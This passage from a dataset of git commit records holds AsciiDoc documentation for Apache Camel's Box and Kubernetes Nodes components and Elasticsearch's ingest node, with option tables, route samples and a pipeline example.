\n\n[source]\n----\nbox:files\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|uploadFile |upload |parentFolderId, content, fileName, [created], [modified], [size], [listener] |com.box.sdk.BoxFile\n\n|downloadFile |download |fileId, output, [rangeStart], [rangeEnd], [listener] |java.io.OutputStream\n\n|copyFile |copy |fileId, destinationFolderId, [newName] |com.box.sdk.BoxFile\n\n|moveFile |move |fileId, destinationFolderId, [newName] |com.box.sdk.BoxFile\n\n|renameFile |rename |fileId, newFileName |com.box.sdk.BoxFile \n\n|createFileSharedLink |link |fileId, access, [unshareDate], [permissions] |com.box.sdk.BoxSharedLink\n\n|deleteFile |delete |fileId |\n\n|uploadNewFileVersion |uploadVersion |fileId, fileContent, [modified], [fileSize], [listener] |com.box.boxsdk.BoxFile\n\n|promoteFileVersion |promoteVersion |fileId, version |com.box.sdk.BoxFileVersion\n\n|getFileVersions |versions |fileId |java.util.Collection\n\n|downloadPreviousFileVersions |downloadVersion |fileId, version, output, [listener] |java.io.OutputStream\n\n|deleteFileVersion |deleteVersion |fileId, version |\n\n|getFileInfo |info |fileId, fields |com.box.sdk.BoxFile.Info\n\n|updateFileInfo |updateInfo |fileId, info |com.box.sdk.BoxFile\n\n|createFileMetadata |createMetadata |fileId, metadata, [typeName] |com.box.sdk.Metadata\n\n|getFileMetadata |metadata |fileId, [typeName] |com.box.sdk.Metadata\n\n|updateFileMetadata |updateMetadata |fileId, metadata |com.box.sdk.Metadata\n\n|deleteFileMetadata |deleteMetadata |fileId | \n\n|getDownloadUrl |url |fileId |java.net.URL\n\n|getPreviewLink |preview |fileId |java.net.URL\n\n|getFileThumbnail |thumbnail |fileId, fileType, minWidth, minHeight, maxWidth, maxHeight |byte[]\n|===\n\nURI Options for _files_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|parentFolderId |String\n\n|content |java.io.InputStream\n\n|fileName |String\n\n|created |Date\n\n|modified |Date\n\n|size |Long\n\n|listener |com.box.sdk.ProgressListener \n\n|output |java.io.OutputStream\n\n|rangeStart |Long\n\n|rangeEnd |Long\n\n|outputStreams |java.io.OutputStream[]\n\n|destinationFolderId |String\n\n|newName |String\n\n|fields |String[]\n\n|info |com.box.sdk.BoxFile.Info\n\n|fileSize |Long\n\n|version |Integer\n\n|access |com.box.sdk.BoxSharedLink.Access\n\n|unshareDate |Date\n\n|permissions |com.box.sdk.BoxSharedLink.Permissions\n\n|fileType |com.box.sdk.BoxFile.ThumbnailFileType\n\n|minWidth |Integer\n\n|minHeight |Integer\n\n|maxWidth |Integer\n\n|maxHeight |Integer\n\n|metadata |com.box.sdk.Metadata\n\n|typeName |String\n|===\n\n==== Endpoint Prefix _folders_\n\nFor more information on Box folders see\nhttps:\/\/developer.box.com\/reference#folder-object[https:\/\/developer.box.com\/reference#folder-object].\nThe following endpoints can be invoked with the prefix\n*`folders`*\u00a0as follows. 
\n\n[source]\n----\nbox:folders\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getRootFolder |root | |com.box.sdk.BoxFolder\n\n|createFolder |create |parentFolderId, folderName |com.box.sdk.BoxFolder\n\n|createFolder |create |parentFolderId, path |com.box.sdk.BoxFolder\n\n|copyFolder |copy |folderId, destinationfolderId, [newName] |com.box.sdk.BoxFolder \n\n|moveFolder |move |folderId, destinationFolderId, newName |com.box.sdk.BoxFolder\n\n|renameFolder |rename |folderId, newFolderName |com.box.sdk.BoxFolder\n\n|createFolderSharedLink |link |folderId, access, [unsharedDate], [permissions] |java.util.List\n\n|deleteFolder |delete |folderId |\n\n|getFolder |folder |path |com.box.sdk.BoxFolder\n\n|getFolderInfo |info |folderId, fields |com.box.sdk.BoxFolder.Info\n\n|getFolderItems |items |folderId, offset, limit, fields |java.util.List\n\n|updateFolderInfo |updateInfo |folderId, info |com.box.sdk.BoxFolder\n|===\n\nURI Options for _folders_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|path |String[]\n\n|folderId |String\n\n|offset |Long\n\n|limit |Long\n\n|fields |String[]\n\n|parentFolderId |String\n\n|folderName |String\n\n|destinationFolderId |String\n\n|newName |String\n\n|newFolderName |String\n\n|info |String\n\n|access |com.box.sdk.BoxSharedLink.Access\n\n|unshareDate |Date\n\n|permissions |com.box.sdk.BoxSharedLink.Permissions\n|===\n\n==== Endpoint Prefix\u00a0_groups_\n\nFor more information on Box groups see\nhttps:\/\/developer.box.com\/reference#group-object[https:\/\/developer.box.com\/reference#group-object].\nThe following endpoints can be invoked with the prefix\u00a0*`groups`*\u00a0as\nfollows:\n\n[source]\n----\nbox:groups\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|createGroup |create |name, [provenance, externalSyncIdentifier, description, invitabilityLevel, memberViewabilityLevel] |com.box.sdk.BoxGroup \n\n|addGroupMembership |createMembership |groupId, userId, role |com.box.sdk.BoxGroupMembership\n\n|deleteGroup |delete |groupId |\n\n|getAllGroups |groups | |java.util.Collection\n\n|getGroupInfo |info |groupId |com.box.sdk.BoxGroup.Info\n\n|updateGroupInfo |updateInfo |groupId, groupInfo |com.box.sdk.BoxGroup\n\n|addGroupMembership |addMembership |groupId, userId, role |com.box.sdk.BoxGroupMembership\n\n|deleteGroupMembership |deleteMembership |groupMembershipId |\n\n|getGroupMemberships |memberships |groupId |java.uti.Collection\n\n|getGroupMembershipInfo |membershipInfo |groupMemebershipId |com.box.sdk.BoxGroup.Info\n\n|updateGroupMembershipInfo |updateMembershipInfo |groupMemebershipId, info |com.box.sdk.BoxGroupMembership\n|===\n\nURI Options for\u00a0_groups_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|name |String\n\n|groupId |String\n\n|userId |String\n\n|role |com.box.sdk.BoxGroupMembership.Role\n\n|groupMembershipId |String\n\n|info |com.box.sdk.BoxGroupMembership.Info\n\n|===\n\n==== Endpoint Prefix\u00a0_search_\n\nFor more information on Box search API see\nhttps:\/\/developer.box.com\/reference#searching-for-content[https:\/\/developer.box.com\/reference#searching-for-content].\u00a0The\nfollowing endpoints can be invoked with the 
prefix\u00a0*`search`*\u00a0as\nfollows:\n\n[source]\n----\nbox:search\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|searchFolder |search |folderId, query |java.util.Collection\n|===\n\nURI Options for\u00a0_search_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|folderId |String\n\n|query |String\n|===\n\n==== Endpoint Prefix\u00a0_tasks_\n\nFor information on Box tasks see\nhttps:\/\/developer.box.com\/reference#task-object-1[https:\/\/developer.box.com\/reference#task-object-1].\nThe following endpoints can be invoked with the prefix\u00a0*`tasks`*\u00a0as\nfollows:\n\n[source]\n----\nbox:tasks\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFileTask |add |fileId, action, dueAt, [message] |com.box.sdk.BoxUser\n\n|deleteTask |delete |taskId |\n\n|getFileTasks |tasks |fileId |java.util.List\n\n|getTaskInfo |info |taskId |com.box.sdk.BoxTask.Info\n\n|updateTaskInfo |updateInfo |taskId, info |com.box.sdk.BoxTask\n\n|addAssignmentToTask |addAssignment |taskId, assignTo |com.box.sdk.BoxTask\n\n|deleteTaskAssignment |deleteAssignment |taskAssignmentId |\n\n|getTaskAssignments |assignments | taskId |java.util.List\n\n|getTaskAssignmentInfo |assignmentInfo |taskAssignmentId |com.box.sdk.BoxTaskAssignment.Info\n|===\n\nURI Options for\u00a0_tasks_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|fileId |String\n\n|action |com.box.sdk.BoxTask.Action\n\n|dueAt |Date\n\n|message |String\n\n|taskId |String\n\n|info |com.box.sdk.BoxTask.Info\n\n|assignTo |com.box.sdk.BoxUser\n\n|taskAssignmentId |String\n|===\n\n==== Endpoint Prefix\u00a0_users_\n\nFor information on Box users see\nhttps:\/\/developer.box.com\/reference#user-object[https:\/\/developer.box.com\/reference#user-object].\nThe following endpoints can be invoked with the prefix\u00a0*`users`*\u00a0as\nfollows:\n\n[source]\n----\nbox:users\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getCurrentUser |currentUser | |com.box.sdk.BoxUser\n\n|getAllEnterpriseOrExternalUsers |users |filterTerm, [fields] |com.box.sdk.BoxUser\n\n|createAppUser |create |name, [params] |com.box.sdk.BoxUser\n\n|createEnterpriseUser |create |login, name, [params] |com.box.sdk.BoxUser\n\n|deleteUser |delete |userId, notifyUser, force |\n\n|getUserEmailAlias |emailAlias |userId |com.box.sdk.BoxUser\n\n|deleteUserEmailAlias |deleteEmailAlias |userId, emailAliasId |java.util.List\n\n|getUserInfo |info | userId |com.box.sdk.BoxUser.Info\n\n|updateUserInfo |updateInfo |userId, info |com.box.sdk.BoxUser\n\n|moveFolderToUser |- |userId, sourceUserId |com.box.sdk.BoxFolder.Info\n|===\n\nURI Options for\u00a0_users_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|defaultRequest |com.box.restclientv2.requestsbase.BoxDefaultRequestObject\n\n|emailAliasRequest |com.box.boxjavalibv2.requests.requestobjects.BoxEmailAliasRequestObject\n\n|emailId |String\n\n|filterTerm |String\n\n|folderId |String\n\n|simpleUserRequest |com.box.boxjavalibv2.requests.requestobjects.BoxSimpleUserRequestObject\n\n|userDeleteRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserDeleteRequestObject\n\n|userId |String\n\n|userRequest 
|com.box.boxjavalibv2.requests.requestobjects.BoxUserRequestObject\n\n|userUpdateLoginRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserUpdateLoginRequestObject\n|===\n\n=== Consumer Endpoints:\n\nFor more information on Box events see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nConsumer endpoints can only use the endpoint prefix *events* as\nshown in the example next.\n\n[source]\n----\nbox:events\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|events | |[startingPosition] |com.box.sdk.BoxEvent \n|===\n\nURI Options for\u00a0_events_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\",]\n|===\n|Name |Type\n\n|startingPosition |Long\n|===\n\n=== Message header\n\nAny of the options\u00a0can be provided in a message header for producer\nendpoints with *CamelBox.* prefix.\n\n=== Message body\n\nAll result message bodies utilize objects provided by the Box Java SDK.\nProducer endpoints can specify the option name for incoming message body\nin the *inBody* endpoint parameter.\n\n=== Samples\n\nThe following route uploads new files to the user's root folder:\n\n[source,java]\n----\nfrom(\"file:...\")\n .to(\"box:\/\/files\/upload\/inBody=fileUploadRequest\");\n----\n\nThe following route polls user's account for updates:\n\n[source,java]\n----\nfrom(\"box:\/\/events\/listen?startingPosition=-1\")\n .to(\"bean:blah\");\n----\n\nThe following route uses a producer with dynamic header options.\u00a0The\n*fileId*\u00a0property has the Box file id and the *output* property has \nthe output stream of the file contents, so they are assigned to the\n*CamelBox.fileId* header and *CamelBox.output* header respectively\nas follows:\n\n[source,java]\n----\nfrom(\"direct:foo\")\n .setHeader(\"CamelBox.fileId\", header(\"fileId\"))\n .setHeader(\"CamelBox.output\", header(\"output\"))\n .to(\"box:\/\/files\/download\")\n .to(\"file:\/\/...\");\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee93b7086943d64a9413233985ed5f4cbf0a8b4f","subject":"Camel-Kubernetes: Added supported producer operation to nodes docs","message":"Camel-Kubernetes: Added supported producer operation to nodes 
docs\n","repos":"zregvart\/camel,alvinkwekel\/camel,tadayosi\/camel,adessaigne\/camel,CodeSmell\/camel,DariusX\/camel,nikhilvibhav\/camel,zregvart\/camel,gnodet\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,nicolaferraro\/camel,christophd\/camel,tadayosi\/camel,pax95\/camel,ullgren\/camel,apache\/camel,nikhilvibhav\/camel,mcollovati\/camel,adessaigne\/camel,DariusX\/camel,objectiser\/camel,tdiesler\/camel,apache\/camel,apache\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,ullgren\/camel,objectiser\/camel,DariusX\/camel,pax95\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tdiesler\/camel,cunningt\/camel,ullgren\/camel,CodeSmell\/camel,mcollovati\/camel,adessaigne\/camel,apache\/camel,DariusX\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,gnodet\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,pax95\/camel,nicolaferraro\/camel,gnodet\/camel,nicolaferraro\/camel,mcollovati\/camel,pmoerenhout\/camel,christophd\/camel,tadayosi\/camel,alvinkwekel\/camel,cunningt\/camel,cunningt\/camel,tdiesler\/camel,nicolaferraro\/camel,zregvart\/camel,tdiesler\/camel,apache\/camel,objectiser\/camel,adessaigne\/camel,alvinkwekel\/camel,pmoerenhout\/camel,alvinkwekel\/camel,pmoerenhout\/camel,gnodet\/camel,zregvart\/camel,apache\/camel,mcollovati\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,nikhilvibhav\/camel,cunningt\/camel,adessaigne\/camel,nikhilvibhav\/camel,christophd\/camel,tdiesler\/camel,CodeSmell\/camel,pax95\/camel,objectiser\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-nodes-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-nodes-component.adoc","new_contents":"[[kubernetes-nodes-component]]\n= Kubernetes Nodes Component\n\n*Available as of Camel version 2.17*\n\nThe Kubernetes Nodes component is one of xref:kubernetes.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes node operations and a consumer to consume kubernetes\nnode events.\n \n\n\n== Component Options\n\n\/\/ component options: START\nThe Kubernetes Nodes component supports 1 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Kubernetes Nodes endpoint is configured using URI syntax:\n\n----\nkubernetes-nodes:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (30 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (common) | The Kubernetes API Version to use | | String\n| *dnsDomain* (common) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (common) | Default KubernetesClient to use if provided | | KubernetesClient\n| *portName* (common) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (common) | The port protocol, used for ServiceCall EIP | tcp | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error 
Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *labelKey* (consumer) | The Consumer Label key when watching at some resources | | String\n| *labelValue* (consumer) | The Consumer Label value when watching at some resources | | String\n| *namespace* (consumer) | The namespace | | String\n| *poolSize* (consumer) | The Consumer pool size | 1 | int\n| *resourceName* (consumer) | The Consumer Resource Name we would like to watch | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). 
| false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-kubernetes-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 2 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.kubernetes-nodes.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.kubernetes-nodes.enabled* | Whether to enable auto configuration of the kubernetes-nodes component. This is enabled by default. 
| | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n== Supported producer operation\n\n- listNodes\n- listNodesByLabels\n- getNode\n- createNode\n- deleteNode\n\n","old_contents":"[[kubernetes-nodes-component]]\n= Kubernetes Nodes Component\n\n*Available as of Camel version 2.17*\n\nThe Kubernetes Nodes component is one of xref:kubernetes.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes node operations and a consumer to consume kubernetes\nnode events.\n \n\n\n== Component Options\n\n\/\/ component options: START\nThe Kubernetes Nodes component supports 1 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Kubernetes Nodes endpoint is configured using URI syntax:\n\n----\nkubernetes-nodes:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (30 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (common) | The Kubernetes API Version to use | | String\n| *dnsDomain* (common) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (common) | Default KubernetesClient to use if provided | | KubernetesClient\n| *portName* (common) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (common) | The port protocol, used for ServiceCall EIP | tcp | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *labelKey* (consumer) | The Consumer Label key when watching at some resources | | String\n| *labelValue* (consumer) | The Consumer Label value when watching at some resources | | String\n| *namespace* (consumer) | The namespace | | String\n| *poolSize* (consumer) | The Consumer pool size | 1 | int\n| *resourceName* (consumer) | The Consumer Resource Name we would like to watch | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. 
By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-kubernetes-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 2 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.kubernetes-nodes.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.kubernetes-nodes.enabled* | Whether to enable auto configuration of the kubernetes-nodes component. This is enabled by default. | | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fe62de217aeefc69c7272a558e9884a359657c4","subject":"show a full ingest example in the index page, to let user fast understand ingest node. (#43476)","message":"show a full ingest example in the index page, to let user fast understand ingest node. 
(#43476)\n\n","repos":"scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/ingest.asciidoc","new_file":"docs\/reference\/ingest.asciidoc","new_contents":"[[ingest]]\n= Ingest node\n\n[partintro]\n--\nUse an ingest node to pre-process documents before the actual document indexing happens. \nThe ingest node intercepts bulk and index requests, it applies transformations, and it then\npasses the documents back to the index or bulk APIs.\n\nAll nodes enable ingest by default, so any node can handle ingest tasks. You can also create\ndedicated ingest nodes. To disable ingest for a node, configure the following setting in the\nelasticsearch.yml file:\n\n[source,yaml]\n--------------------------------------------------\nnode.ingest: false\n--------------------------------------------------\n\nTo pre-process documents before indexing, <<pipeline,define a pipeline>> that specifies a series of\n<<ingest-processors,processors>>. Each processor transforms the document in some specific way. For example, a\npipeline might have one processor that removes a field from the document, followed by\nanother processor that renames a field. The <<cluster-state,cluster state>> then stores\nthe configured pipelines.\n\nTo use a pipeline, simply specify the `pipeline` parameter on an index or bulk request. This\nway, the ingest node knows which pipeline to use. 
\n\nFor example:\nCreate a pipeline\n\n[source,js]\n--------------------------------------------------\nPUT _ingest\/pipeline\/my_pipeline_id\n{\n \"description\" : \"describe pipeline\",\n \"processors\" : [\n {\n \"set\" : {\n \"field\": \"foo\",\n \"value\": \"new\"\n }\n }\n ]\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST\n\nIndex with defined pipeline\n\n[source,js]\n--------------------------------------------------\nPUT my-index\/_doc\/my-id?pipeline=my_pipeline_id\n{\n \"foo\": \"bar\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nResponse\uff1a\n[source,js]\n--------------------------------------------------\n{\n \"_index\" : \"my-index\",\n \"_type\" : \"_doc\",\n \"_id\" : \"my-id\",\n \"_version\" : 1,\n \"result\" : \"created\",\n \"_shards\" : {\n \"total\" : 2,\n \"successful\" : 2,\n \"failed\" : 0\n },\n \"_seq_no\" : 0,\n \"_primary_term\" : 1\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"successful\" : 2\/\"successful\" : 1\/]\n\nAn index may also declare a <<dynamic-index-settings,default pipeline>> that will be used in the\nabsence of the `pipeline` parameter.\n\nSee <<ingest-apis,Ingest APIs>> for more information about creating, adding, and deleting pipelines.\n\n--\n\ninclude::ingest\/ingest-node.asciidoc[]\n","old_contents":"[[ingest]]\n= Ingest node\n\n[partintro]\n--\nUse an ingest node to pre-process documents before the actual document indexing happens. \nThe ingest node intercepts bulk and index requests, it applies transformations, and it then\npasses the documents back to the index or bulk APIs.\n\nAll nodes enable ingest by default, so any node can handle ingest tasks. You can also create\ndedicated ingest nodes. To disable ingest for a node, configure the following setting in the\nelasticsearch.yml file:\n\n[source,yaml]\n--------------------------------------------------\nnode.ingest: false\n--------------------------------------------------\n\nTo pre-process documents before indexing, <<pipeline,define a pipeline>> that specifies a series of\n<<ingest-processors,processors>>. Each processor transforms the document in some specific way. For example, a\npipeline might have one processor that removes a field from the document, followed by\nanother processor that renames a field. The <<cluster-state,cluster state>> then stores\nthe configured pipelines.\n\nTo use a pipeline, simply specify the `pipeline` parameter on an index or bulk request. This\nway, the ingest node knows which pipeline to use. 
For example:\n\n[source,js]\n--------------------------------------------------\nPUT my-index\/_doc\/my-id?pipeline=my_pipeline_id\n{\n \"foo\": \"bar\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:bad_request]\n\nAn index may also declare a <<dynamic-index-settings,default pipeline>> that will be used in the\nabsence of the `pipeline` parameter.\n\nSee <<ingest-apis,Ingest APIs>> for more information about creating, adding, and deleting pipelines.\n\n--\n\ninclude::ingest\/ingest-node.asciidoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e87604b3614968c860b3c8985d1c9e82ac25d85","subject":"Docs: minor update to resiliency page","message":"Docs: minor update to resiliency 